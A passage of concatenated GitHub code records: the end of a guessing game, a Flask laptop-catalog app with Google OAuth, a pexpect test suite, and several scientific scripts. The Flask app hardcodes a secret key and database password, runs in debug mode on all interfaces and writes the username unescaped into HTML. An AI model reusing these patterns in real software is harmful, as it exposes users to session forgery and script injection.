your guess is too high. Try again.\")\n else:\n # They guessed the number correctly!\n break\n segment.clear()\n segment.set_digit(3, 10 - guess_count)\n segment.write_display()\n\n# Check if a correct guess was made.\nif number_guessed == my_number:\n colorAll(strip, Color(0, 255, 0)) # Green wipe\n print(\"Great job \" + name + \"! You guessed my number in \" + str(guess_count) + \" guesses.\")\n print(\"Your guesses were: \" + \" \".join(str(i) for i in guess_history))\n time.sleep(3)\n colorAll(strip, Color(0, 0, 0))\n segment.clear()\n segment.write_display()\nelse:\n print(\"Sorry! You didn't guess my number. 
The number I am thinking of is \" + str(my_number) + \".\")\n time.sleep(3)\n colorAll(strip, Color(0, 0, 0))\n segment.clear()\n segment.write_display()\n","repo_name":"farinaanthony96/Sales_Associate_Projects","sub_path":"src/guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6987158261","text":"#!/usr/bin/env python3\nimport os\nfrom flask import Flask, render_template, request, redirect, jsonify, \\\n url_for, flash, send_from_directory\nfrom werkzeug.utils import secure_filename\n\nfrom sqlalchemy import create_engine, asc\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Brand, Model, User\n\nfrom flask import session as login_session\nimport random\nimport string\n\n# from oauth2client import client\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport json\nfrom flask import make_response\nimport requests\nimport logging\n\nUPLOAD_FOLDER = 'static'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nCLIENT_ID = json.loads(\n open('client_secrets.json', 'r').read())['web']['client_id']\n\n# Connect to Database and create database session\nengine = create_engine('postgresql://computershop:12345@localhost/catalog')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\n\n\n# Create a state token to prevent request\n# Store it in the session for later\n@app.route('/login')\ndef show_login():\n \"\"\" Create state token and store it in session.\"\"\"\n\n state = ''.join(random.choice(string.ascii_uppercase + string.\n digits) for x in range(32))\n login_session['state'] = state\n # Render the login template\n return render_template('login.html', STATE=state)\n\n\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n \"\"\"Connect with google.\"\"\"\n # Validate state token\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n # Obtain authorization code\n code = request.data\n\n try:\n # Upgrade the authorization code into a credentials object\n oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(\n json.dumps('Failed to upgrade the authorization code.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Check that the access token is valid.\n access_token = credentials.access_token\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n % access_token)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1])\n # If there was an error in the access token info, abort.\n if result.get('error') is not None:\n response = make_response(json.dumps(\n result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user.\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\n \"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # 
Verify that the access token is valid for this app.\n    if result['issued_to'] != CLIENT_ID:\n        response = make_response(\n            json.dumps(\"Token's client ID does not match app's.\"), 401)\n        logging.info(\"Token's client ID does not match app's.\")\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    stored_access_token = login_session.get('access_token')\n    stored_gplus_id = login_session.get('gplus_id')\n    if stored_access_token is not None and gplus_id == stored_gplus_id:\n        response = make_response(json.dumps(\n            'Current user is already connected.'),\n            200)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Store the access token in the session for later use.\n    login_session['access_token'] = credentials.access_token\n    login_session['gplus_id'] = gplus_id\n\n    # Get user info\n    userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n    params = {'access_token': credentials.access_token, 'alt': 'json'}\n    answer = requests.get(userinfo_url, params=params)\n\n    data = answer.json()\n\n    login_session['username'] = data['name']\n    login_session['picture'] = data['picture']\n    login_session['email'] = data['email']\n    # ADD PROVIDER TO LOGIN SESSION\n    # login_session['provider'] = 'google'\n\n    # see if user exists, if it doesn't make a new one\n    user_id = get_user_id(data[\"email\"])\n    if user_id is None:\n        user_id = create_user(login_session)\n    login_session['userid'] = user_id\n\n    output = ''\n    output += '<h1>Welcome, '\n    output += login_session['username']\n    output += '!</h1>'\n    output += '<img src=\"' + login_session['picture'] + '\">'\n    flash(\"you are now logged in as %s\" % login_session['username'])\n    logging.info(\"done!\")\n    return output\n\n\n# User Helper Functions\n\n# DISCONNECT - Revoke a current user's token and reset their login_session\n\n\n@app.route('/gdisconnect')\ndef gdisconnect():\n    \"\"\"Disconnect from google.\"\"\"\n    # Only disconnect a connected user.\n    access_token = login_session.get('access_token')\n    if access_token is None:\n        response = make_response(\n            json.dumps('Current user not connected.'), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % access_token\n    h = httplib2.Http()\n    result = h.request(url, 'GET')[0]\n    if result['status'] == '200':\n        response = make_response(json.dumps(\n            'Successfully disconnected.'), 200)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    else:\n        response = make_response(json.dumps(\n            'Failed to revoke token for given user.'), 400)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n\n# Disconnect based on provider\n@app.route('/disconnect')\ndef disconnect():\n    \"\"\"Delete stored session.\"\"\"\n    del login_session['access_token']\n    del login_session['username']\n    del login_session['userid']\n    del login_session['picture']\n    del login_session['email']\n    del login_session['gplus_id']\n    del login_session['state']\n\n    flash(\"You have successfully been logged out.\")\n    return redirect(url_for('show_brands'))\n\n\n# User Helper Functions\ndef create_user(login_session):\n    \"\"\"create new user and return user id.\"\"\"\n    session = DBSession()\n    new_user = User(name=login_session['username'], email=login_session[\n        'email'], picture=login_session['picture'])\n    session.add(new_user)\n    session.commit()\n    user = session.query(User).filter_by(\n        email=login_session['email']).one_or_none()\n    return user.id\n\n\ndef get_user_info(user_id):\n    \"\"\"Return user information\"\"\"\n\n    session = DBSession()\n    user = session.query(User).filter_by(id=user_id).one_or_none()\n    return user\n\n\ndef get_user_id(email):\n    \"\"\"Return user id.\"\"\"\n\n    session = DBSession()\n    user = session.query(User).filter_by(email=email).one_or_none()\n    if user is None:\n        return None\n    return user.id\n\n\n# JSON APIs to view Brand Information\n@app.route('/brand/<int:brand_id>/model/JSON')\ndef brand_json(brand_id):\n    \"\"\"Returns Laptop Models in a JSON Format\"\"\"\n    session = DBSession()\n    # brand = session.query(Brand).filter_by(id = brand_id).one()\n    models = session.query(Model).filter_by(brand_id=brand_id).all()\n    return jsonify(Models=[i.serialize for i in models])\n\n\n@app.route('/brand/<int:brand_id>/model/<int:model_id>/JSON')\ndef model_json(brand_id, model_id):\n    \"\"\"Returns Laptop Model in a JSON Format\"\"\"\n\n    session = DBSession()\n    model = session.query(Model).filter_by(id=model_id).one()\n    return jsonify(Model=model.serialize)\n\n\n@app.route('/brand/JSON')\ndef brands_json():\n    session = DBSession()\n    brands = session.query(Brand).all()\n    return jsonify(brands=[r.serialize for r in brands])\n\n\n# Show all brands\n@app.route('/')\n@app.route('/brand/')\ndef show_brands():\n    \"\"\"Render brands.html with permission (edit, delete).\"\"\"\n    session = DBSession()\n    brands = session.query(Brand).order_by(asc(Brand.name))\n\n    if 'username' not in login_session:\n        return render_template('brands.html', brands=brands,\n                               is_admin=False)\n    else:\n        return render_template('brands.html', brands=brands,\n                               is_admin=True)\n\n\n@app.route('/static/<filename>')\ndef 
send_file(filename):\n    \"\"\"Return photo path.\"\"\"\n    return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\n\n# Create a new brand\n@app.route('/brand/new/', methods=['GET', 'POST'])\ndef new_brand():\n    \"\"\"Add new Laptop brand.\"\"\"\n    try:\n        session = DBSession()\n        if request.method == 'POST':\n            name = request.form['name']\n            if name != '':\n                file = request.files['photo']\n                # if user does not select file, browser also\n                # submit an empty part without filename\n                # if file.filename == '':\n                #     flash('No selected file')\n                #     return redirect(request.url)\n                if file and allowed_file(file.filename):\n                    filename = secure_filename(name +\n                                               file.filename).replace(\" \", \"\")\n                    photo = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n                    file.save(photo)\n                else:\n                    flash('File extension is not allowed')\n                    return redirect(request.url)\n                newbrand = Brand(name=request.form['name'], photo=filename,\n                                 user_id=login_session['userid'])\n                session.add(newbrand)\n                session.commit()\n                flash('New Brand %s Successfully Created' % newbrand.name)\n                return redirect(url_for('show_brands'))\n        else:\n            return render_template('brandNew.html')\n    except Exception as ex:\n        return logging.error(str(ex))\n\n\n# Edit brand\n@app.route('/brand/<int:brand_id>/edit/', methods=['GET', 'POST'])\ndef edit_brand(brand_id):\n    \"\"\"Edit brand if the created user is the same as the editing user.\"\"\"\n    session = DBSession()\n    edited_brand = session.query(Brand).filter_by(id=brand_id).one()\n    if request.method == 'POST':\n        created_user = edited_brand.user_id\n        logged_user = login_session['userid']\n        if created_user != logged_user:\n            flash('You are not authorized to edit')\n            return redirect(url_for('show_brands'))\n\n        edit_btn = request.form.get('edit')\n        if edit_btn is not None:\n            if request.form['name']:\n                edited_brand.name = request.form['name']\n                edited_brand.user_id = login_session['userid']\n                session.commit()\n                flash('Brand Successfully Edited %s' % edited_brand.name)\n        return redirect(url_for('show_brands'))\n    else:\n        return render_template('brandEdit.html', brand=edited_brand)\n\n\n# Delete brand and its models\n@app.route('/brand/<int:brand_id>/delete/', methods=['GET', 'POST'])\ndef delete_brand(brand_id):\n    \"\"\"Delete brand if the created user is the same as the deleting user.\"\"\"\n    session = DBSession()\n    deleted_brand = session.query(Brand).filter_by(id=brand_id).one()\n    if request.method == 'POST':\n        delete_btn = request.form.get('delete')\n        created_user = deleted_brand.user_id\n        logged_user = login_session['userid']\n        if created_user != logged_user:\n            flash('You are not authorized to delete')\n            return redirect(url_for('show_brands', brand_id=brand_id))\n        if delete_btn is not None:\n            session.delete(deleted_brand)\n            flash('%s Successfully Deleted' % deleted_brand.name)\n            session.commit()\n            return redirect(url_for('show_brands', brand_id=brand_id))\n\n    else:\n        return render_template('brandDelete.html', brand=deleted_brand)\n\n\n# Show a brand model\n@app.route('/brand/<int:brand_id>/')\n@app.route('/brand/<int:brand_id>/model/')\ndef show_model(brand_id):\n    \"\"\"Render model.html with user permission (edit, delete).\"\"\"\n    session = DBSession()\n    brand = session.query(Brand).filter_by(id=brand_id).one()\n    models = session.query(Model).filter_by(brand_id=brand_id).all()\n\n    user = get_user_info(brand.user_id)\n\n    if 'userid' in login_session:\n        userid_session = login_session['userid']\n        if not user or 'username' not in login_session or \\\n                brand.user_id != userid_session:\n            return render_template('model.html', 
models=models, brand=brand,\n                                   creator=user, is_admin=False)\n        else:\n            return render_template('model.html', models=models, brand=brand,\n                                   creator=user, is_admin=True)\n    else:\n        return render_template('model.html', models=models, brand=brand,\n                               creator=user, is_admin=False)\n\n\n# Create a new brand model\n@app.route('/brand/<int:brand_id>/model/new/', methods=['GET', 'POST'])\ndef new_model(brand_id):\n    \"\"\"Add new laptop model.\"\"\"\n    session = DBSession()\n    # brand = session.query(Brand).filter_by(id = brand_id).one()\n    if request.method == 'POST':\n        file = request.files['photo']\n        # if user does not select file, browser also\n        # submit an empty part without filename\n        # if file.filename == '':\n        #     flash('No selected file')\n        #     return redirect(request.url)\n        if file and allowed_file(file.filename):\n            filename = secure_filename(request.form['name'] +\n                                       file.filename).replace(\" \", \"\")\n            photo = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n            file.save(photo)\n\n            newmodel = Model(name=request.form['name'],\n                             description=request.form['description'],\n                             price=request.form['price'],\n                             photo=filename, brand_id=brand_id)\n            session.add(newmodel)\n            session.commit()\n            flash('New Laptop Model %s Item Successfully Created' %\n                  newmodel.name)\n            return redirect(url_for('show_model', brand_id=brand_id))\n        else:\n            flash('Model must have a photo')\n            return render_template('modelNew.html', brand_id=brand_id)\n    else:\n        return render_template('modelNew.html', brand_id=brand_id)\n\n\n# helper for allowed photos ext.\ndef allowed_file(filename):\n    return '.' in filename and \\\n        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n# Edit a brand model\n@app.route('/brand/<int:brand_id>/model/<int:model_id>/edit',\n           methods=['GET', 'POST'])\ndef edit_model(brand_id, model_id):\n    \"\"\"Modify laptop model only\n\n    if the created user is the same as the editing user.\n    \"\"\"\n    session = DBSession()\n    edited_model = session.query(Model).filter_by(id=model_id).one()\n    if request.method == 'POST':\n        edit_btn = request.form.get('edit')\n        created_user = edited_model.user_id\n        logged_user = login_session['userid']\n        if created_user != logged_user:\n            flash('You are not authorized to edit')\n            return redirect(url_for('show_model', brand_id=brand_id))\n        if edit_btn is not None:\n            if request.form['name']:\n                edited_model.name = request.form['name']\n            if request.form['description']:\n                edited_model.description = request.form['description']\n            if request.form['price']:\n                edited_model.price = request.form['price']\n            edited_model.user_id = login_session['userid']\n            # if 'photo' not in request.files:\n            #     flash('No file part')\n            #     return redirect(request.url)\n            file = request.files['photo']\n            # if user does not select file, browser also\n            # submit an empty part without filename\n            # if file.filename == '':\n            #     flash('No selected file')\n            #     return redirect(request.url)\n            if file and allowed_file(file.filename):\n                filename = secure_filename(request.form['name'] +\n                                           file.filename).replace(\" \", \"\")\n                photo = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n                file.save(photo)\n                edited_model.photo = filename\n            session.add(edited_model)\n            session.commit()\n            flash('Model Successfully Edited')\n        return redirect(url_for('show_model', brand_id=brand_id))\n    else:\n        return render_template('modelEdit.html', brand_id=brand_id,\n                               model_id=model_id, model=edited_model)\n\n\n# Delete brand Model\n@app.route('/brand/<int:brand_id>/model/<int:model_id>/delete',\n           methods=['GET', 'POST'])\ndef delete_model(brand_id, model_id):\n    \"\"\"Remove model\"\"\"\n    session = DBSession()\n    deleted_model = 
session.query(Model).filter_by(id=model_id).one()\n\n    if request.method == 'POST':\n        delete_btn = request.form.get('delete')\n        edit_btn = request.form.get('edit')\n        created_user = deleted_model.user_id\n        logged_user = login_session['userid']\n        if created_user != logged_user:\n            flash('You are not authorized to delete')\n            return redirect(url_for('show_model', brand_id=brand_id))\n        if delete_btn is not None:\n            session.delete(deleted_model)\n            session.commit()\n            flash('Model Successfully Deleted')\n            return redirect(url_for('show_model', brand_id=brand_id))\n        else:\n            return redirect(url_for('show_model', brand_id=brand_id))\n    else:\n        return render_template('modelDelete.html', model=deleted_model)\n\n\nif __name__ == '__main__':\n    app.secret_key = 'super_secret_key'\n    app.debug = True\n    app.run(host='0.0.0.0', port=5000)\n","repo_name":"SamehPierre/item_catalog","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":18548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
{"seq_id":"1108695881","text":"import matplotlib.pyplot as plt\nfrom scipy.signal import correlate\nimport numpy as np\ndef PlotAutoCorr(samples,n,L):\n\t# normalise samples\n\tnormed_samples = (samples - np.mean(samples,axis=0))/np.std(samples,axis=0)\n\t# calculate autocorrelation\n\tcorr = correlate(normed_samples,normed_samples,mode='same',method='fft')/(n*L*3)\n\tprint(corr.shape)\n\treturn plt.plot(range(-n//2,n//2),corr)\n\n\nenergy = np.genfromtxt('data/fake/sk_energies.txt')\n#seqs = np.genfromtxt('data/fake/sk_encode.txt',dtype=int)\n\nPlotAutoCorr(energy,100000,1)\n#PlotAutoCorr(seqs[:,0],100000,1)\nplt.savefig('data/fake/sk_autocorr.png')","repo_name":"andrewcboardman/apta_ml","sub_path":"data_stats/check_gen_data.py","file_name":"check_gen_data.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
{"seq_id":"26884571777","text":"import pexpect\nimport unittest\nimport subprocess\nimport sys\nimport os\nfrom . 
import PexpectTestCase\n\nunicode_type = str if pexpect.PY3 else unicode\n\n\ndef timeout_callback(values):\n if values[\"event_count\"] > 3:\n return 1\n return 0\n\n\ndef function_events_callback(values):\n try:\n previous_echoed = (values[\"child_result_list\"][-1]\n .decode().split(\"\\n\")[-2].strip())\n if previous_echoed.endswith(\"stage-1\"):\n return \"echo stage-2\\n\"\n elif previous_echoed.endswith(\"stage-2\"):\n return \"echo stage-3\\n\"\n elif previous_echoed.endswith(\"stage-3\"):\n return \"exit\\n\"\n else:\n raise Exception(\"Unexpected output {0}\".format(previous_echoed))\n except IndexError:\n return \"echo stage-1\\n\"\n\n\nclass RunFuncTestCase(PexpectTestCase.PexpectTestCase):\n if sys.platform != 'win32':\n runfunc = staticmethod(pexpect.run)\n cr = b'\\r'\n empty = b''\n prep_subprocess_out = staticmethod(lambda x: x)\n\n def setUp(self):\n self.runenv = os.environ.copy()\n self.runenv['PS1'] = 'GO:'\n super(RunFuncTestCase, self).setUp()\n\n def test_run_exit(self):\n (data, exitstatus) = self.runfunc(sys.executable + ' exit1.py', withexitstatus=1)\n assert exitstatus == 1, \"Exit status of 'python exit1.py' should be 1.\"\n\n def test_run(self):\n the_old_way = subprocess.Popen(\n args=['uname', '-m', '-n'],\n stdout=subprocess.PIPE\n ).communicate()[0].rstrip()\n\n (the_new_way, exitstatus) = self.runfunc(\n 'uname -m -n', withexitstatus=1)\n the_new_way = the_new_way.replace(self.cr, self.empty).rstrip()\n\n self.assertEqual(self.prep_subprocess_out(the_old_way), the_new_way)\n self.assertEqual(exitstatus, 0)\n\n def test_run_callback(self):\n # TODO it seems like this test could block forever if run fails...\n events = {pexpect.TIMEOUT: timeout_callback}\n self.runfunc(\"cat\", timeout=1, events=events)\n\n def test_run_bad_exitstatus(self):\n (the_new_way, exitstatus) = self.runfunc(\n 'ls -l /najoeufhdnzkxjd', withexitstatus=1)\n assert exitstatus != 0\n\n def test_run_event_as_string(self):\n events = [\n # second match on 'abc', echo 'def'\n ('abc\\r\\n.*GO:', 'echo \"def\"\\n'),\n # final match on 'def': exit\n ('def\\r\\n.*GO:', 'exit\\n'),\n # first match on 'GO:' prompt, echo 'abc'\n ('GO:', 'echo \"abc\"\\n')\n ]\n\n (data, exitstatus) = pexpect.run(\n 'bash --norc',\n withexitstatus=True,\n events=events,\n env=self.runenv,\n timeout=10)\n assert exitstatus == 0\n\n def test_run_event_as_function(self):\n events = [\n ('GO:', function_events_callback)\n ]\n\n (data, exitstatus) = pexpect.run(\n 'bash --norc',\n withexitstatus=True,\n events=events,\n env=self.runenv,\n timeout=10)\n assert exitstatus == 0\n\n def test_run_event_as_method(self):\n events = [\n ('GO:', self._method_events_callback)\n ]\n\n (data, exitstatus) = pexpect.run(\n 'bash --norc',\n withexitstatus=True,\n events=events,\n env=self.runenv,\n timeout=10)\n assert exitstatus == 0\n\n def test_run_event_typeerror(self):\n events = [('GO:', -1)]\n with self.assertRaises(TypeError):\n pexpect.run('bash --norc',\n withexitstatus=True,\n events=events,\n env=self.runenv,\n timeout=10)\n\n def _method_events_callback(self, values):\n try:\n previous_echoed = (values[\"child_result_list\"][-1].decode()\n .split(\"\\n\")[-2].strip())\n if previous_echoed.endswith(\"foo1\"):\n return \"echo foo2\\n\"\n elif previous_echoed.endswith(\"foo2\"):\n return \"echo foo3\\n\"\n elif previous_echoed.endswith(\"foo3\"):\n return \"exit\\n\"\n else:\n raise Exception(\"Unexpected output {0!r}\"\n .format(previous_echoed))\n except IndexError:\n return \"echo foo1\\n\"\n\n\nclass 
RunUnicodeFuncTestCase(RunFuncTestCase):\n    if sys.platform != 'win32':\n        runfunc = staticmethod(pexpect.runu)\n        cr = b'\\r'.decode('ascii')\n        empty = b''.decode('ascii')\n        prep_subprocess_out = staticmethod(lambda x: x.decode('utf-8', 'replace'))\n\n    def test_run_unicode(self):\n        if pexpect.PY3:\n            char = chr(254)  # þ\n            pattern = '<in >'\n        else:\n            char = unichr(254)  # analysis:ignore\n            pattern = '<in >'.decode('ascii')\n\n        def callback(values):\n            if values['event_count'] == 0:\n                return char + '\\n'\n            else:\n                return True  # Stop the child process\n\n        output = pexpect.runu(self.PYTHONBIN + ' echo_w_prompt.py',\n                              env={'PYTHONIOENCODING': 'utf-8'},\n                              events={pattern: callback})\n        assert isinstance(output, unicode_type), type(output)\n        assert ('<out>' + char) in output, output\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"pexpect/pexpect","sub_path":"tests/test_run.py","file_name":"test_run.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","stars":2458,"dataset":"github-code","pt":"67"}
{"seq_id":"70740480853","text":"#!/usr/bin/python3\n\nimport os\nimport dynein.run as run\nimport glob\nimport numpy as np\nimport argparse\nimport subprocess\n\ndef latex_format(x):\n    if isinstance(x, float) or isinstance(x, int):\n        x = '{:e}'.format(x)\n    if 'e+0' in x:\n        m,e = x.split('e+0')\n        if m == '1':\n            return r'10^{'+e+'}'\n        return m + r'\\times 10^{' + e+ '}'\n    if 'e+' in x:\n        m,e = x.split('e+')\n        if m == '1':\n            return r'10^{'+e+'}'\n        return m + r'\\times 10^{' + e+ '}'\n    if 'e-0' in x:\n        m,e = x.split('e-0')\n        if m == '1':\n            return r'10^{-'+e+'}'\n        return m + r'\\times 10^{-' + e+ '}'\n    if 'e' in x:\n        m,e = x.split('e')\n        if m == '1':\n            return r'10^{'+e+'}'\n        return m + r'\\times 10^{' + e+ '}'\n    # if isinstance(x, str):\n    #     x = x.replace('-', '_')\n    return x\n\nparser = argparse.ArgumentParser(description=\"script to generate unbinding probabilities of bb dynein\")\n\nparser.add_argument('-k_b', '--binding', dest='k_b', action='store', type=float,\n                    default=1e8, help=\"pre-exponential binding constant\", metavar='')\nparser.add_argument('-k_ub', '--unbinding', dest='k_ub', action='store', type=float,\n                    default=100, help=\"pre-exponential unbinding constant\", metavar='')\nparser.add_argument('-t', '--runtime', dest='runtime', action='store', type=float,\n                    default=1.0, help='total runtime for simulation in seconds', metavar='')\nparser.add_argument('-exp', '--exp-unbinding-constant', dest='exp_unbinding_constant',\n                    action='store', type=float, default=0.0, help=\"exponential unbinding constant\", metavar='')\n\nparser.add_argument('-s', '--seed', dest ='seed', action='store', type=float, default=1.0, help =\"random number seed\", metavar='')\nparser.add_argument('-cb', '--cb', dest ='cb', action='store', type=float, default=0.1, help =\"cb\", metavar='')\nparser.add_argument('-cm', '--cm', dest ='cm', action='store', type=float, default=0.4, help =\"cm\", metavar='')\nparser.add_argument('-ct', '--ct', dest ='ct', action='store', type=float, default=0.2, help =\"ct\", metavar='')\n\nparser.add_argument('-l', '--label', dest='label', action='store', type=str, default='default', help=\"label for run\", metavar='')\n\nparser.add_argument('-w', '--writerate', dest='write_rate', action='store', type=str, default=1e6, help=\"writes per second\", metavar='')\n\nargs = parser.parse_args()\n\nif os.path.exists('run-unbinding-rate-simulations.py'):\n    os.chdir('../')\nos.system(\"make simulate_unbinding_rates\")\n\nif not 
os.path.exists('data/unbinding_probability/'):\n    os.makedirs('data/unbinding_probability/')\n\nfor L in [1, 5, 10, 15, 20, 25, 30, 35, 40]:\n    basename = \"%s__L-%s,s-%s\" % (args.label, str(L), args.seed)\n\n    cmd = [\"./simulate_unbinding_rates\",\n           \"--label\", \"%s\" % str(args.label),\n           \"--k_b\", \"%g\" % float(args.k_b),\n           \"--k_ub\", \"%g\" % float(args.k_ub),\n           \"--c\", \"%g\" % float(args.exp_unbinding_constant),\n           \"--cb\", \"%g\" % float(args.cb),\n           \"--cm\", \"%g\" % float(args.cm),\n           \"--ct\", \"%g\" % float(args.ct),\n           \"--ls\", \"10.49\",\n           \"--lt\", \"23.8\",\n           \"--eqb\", \"120\",\n           \"--eqmpre\", \"200\",\n           \"--eqmpost\", \"224\",\n           \"--eqt\", \"0\",\n           \"--write_rate\", \"%g\" % float(args.write_rate),\n           \"--runtime\", \"%g\" % float(args.runtime),\n           \"--seed\", \"%g\" % float(args.seed),\n           \"--dt\", \"1e-10\",\n           \"--L\", \"%g\" % float(L)]\n\n    if not os.path.exists('runlogs'):\n        os.makedirs('runlogs')\n    out = open('runlogs/' + basename + '.out', 'w')\n\n    print(\"Running: \", \" \".join(cmd), out)\n    out.flush()\n    process_object = subprocess.Popen(cmd, stdout=out, stderr=subprocess.PIPE)\n    err = process_object.communicate()[1]\n    if (err != b''):\n        print(\"\\n##################################\",\n              \"\\nSimulation exited in error: \\n\\n\",\n              err.decode(\"utf-8\"),\n              \"\\n##################################\\n\\n\")\n\nwith open(\"data/unbinding_probability/%s.tex\" % args.label, \"w\") as f:\n    f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"runlabel\").replace(\"_\",\"\"), latex_format(args.label)) + '\\n')\n    f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"kb\").replace(\"_\",\"\"), latex_format(args.k_b)) + '\\n')\n    f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"kub\").replace(\"_\",\"\"), latex_format(args.k_ub)) + '\\n')\n    f.write(r'\\newcommand\\%s{%s}' %(latex_format(\"cexp\").replace(\"_\",\"\"), latex_format(args.exp_unbinding_constant)) + '\\n')\n    f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"cb\").replace(\"_\",\"\"), latex_format(args.cb))+ '\\n')\n    f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"cm\").replace(\"_\",\"\"), latex_format(args.cm))+ '\\n')\n    f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"ct\").replace(\"_\",\"\"), latex_format(args.ct))+ '\\n')\n    f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"ls\").replace(\"_\",\"\"), latex_format(10.49))+ '\\n')\n    f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"lt\").replace(\"_\",\"\"), latex_format(23.8))+ '\\n')\n    f.write(r'\\newcommand\\%s{%s}' % (latex_format(\"w_rate\").replace(\"_\",\"\"), latex_format(args.write_rate))+ '\\n')\n","repo_name":"elliotc12/dynein_walk","sub_path":"scripts/run-unbinding-rate-simulations.py","file_name":"run-unbinding-rate-simulations.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"}
{"seq_id":"9344001837","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sklearn\nimport sklearn.datasets\nimport sklearn.linear_model\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\n\nmin_max_scaler = MinMaxScaler()\nss = StandardScaler()\nnp.random.seed(1) # make each run produce the same random numbers\n\n\n# load the data\n\nInputIndex = [\n    'Rn', 'PAR', 'fdif', 'PARdif', 'PARdir',\n    'Ta', 'Ts', 'Vpd', 'RH', 'Ustar', 'O3',\n    'VWC5', 'VWC25', 'VWC50', 'VWC100', 'VWC150', 'VWC200']\nOutputIndex = ['NEE']\ndata = pd.read_csv('data/example.csv')\n\n# 
split the data into a training set and a validation set; test_size=0.2 randomly selects 20% of the full dataset train as the validation set, with random seed 0\ntrain = data[InputIndex]\ntarget = data[OutputIndex]\n\ntrX, teX, trY, teY = train_test_split(train, target, test_size=0.2, random_state=0)\nX = min_max_scaler.fit_transform(trX)\nY = min_max_scaler.fit_transform(trY)\ntest_X = min_max_scaler.transform(teX)\ntest_y = min_max_scaler.transform(teY)\n\n\nshape_X = X.shape # X: rows by 17 columns\nshape_Y = Y.shape # Y: 1 column\nm = X.shape[1] # number of samples\n\ndef sigmoid(x):\n    \"\"\"\n    Compute the sigmoid of x\n\n    Arguments:\n    x -- A scalar or numpy array of any size.\n\n    Return:\n    s -- sigmoid(x)\n    \"\"\"\n    s = 1 / (1 + np.exp(-x))\n    return s\n\n# define the neural network structure\ndef layer_sizes(X, Y):\n    \"\"\"\n    Arguments:\n    X -- input dataset of shape (input size, number of examples)\n    Y -- labels of shape (output size, number of examples)\n    Returns:\n    n_x -- the size of the input layer\n    n_h -- the size of the hidden layer\n    n_y -- the size of the output layer\n    \"\"\"\n    n_x = X.shape[0] # number of input-layer neurons\n    n_h = 20 # number of hidden-layer neurons\n    n_y = Y.shape[0] # number of output neurons\n\n    return (n_x, n_h, n_y)\n\n\n# initialize the model parameters\ndef initialize_parameters(n_x, n_h, n_y):\n    \"\"\"\n    Argument:\n    n_x -- size of the input layer\n    n_h -- size of the hidden layer\n    n_y -- size of the output layer\n    Returns:\n    params -- python dictionary containing your parameters:\n                    W1 -- weight matrix of shape (n_h, n_x)\n                    b1 -- bias vector of shape (n_h, 1)\n                    W2 -- weight matrix of shape (n_y, n_h)\n                    b2 -- bias vector of shape (n_y, 1)\n    \"\"\"\n    np.random.seed(2)\n    W1 = np.random.randn(n_h, n_x) * 0.01\n    b1 = np.zeros((n_h, 1))\n    W2 = np.random.randn(n_y, n_h) * 0.01\n    b2 = np.zeros((n_y, 1))\n    assert (W1.shape == (n_h, n_x))\n    assert (b1.shape == (n_h, 1))\n    assert (W2.shape == (n_y, n_h))\n    assert (b2.shape == (n_y, 1))\n\n    parameters = {\"W1\": W1,\n                  \"b1\": b1,\n                  \"W2\": W2,\n                  \"b2\": b2}\n\n    return parameters\n\n\n# forward propagation\ndef forward_propagation(X, parameters):\n    \"\"\"\n    Argument:\n    X -- input data of size (n_x, m)\n    parameters -- python dictionary containing your parameters (output of initialization function)\n    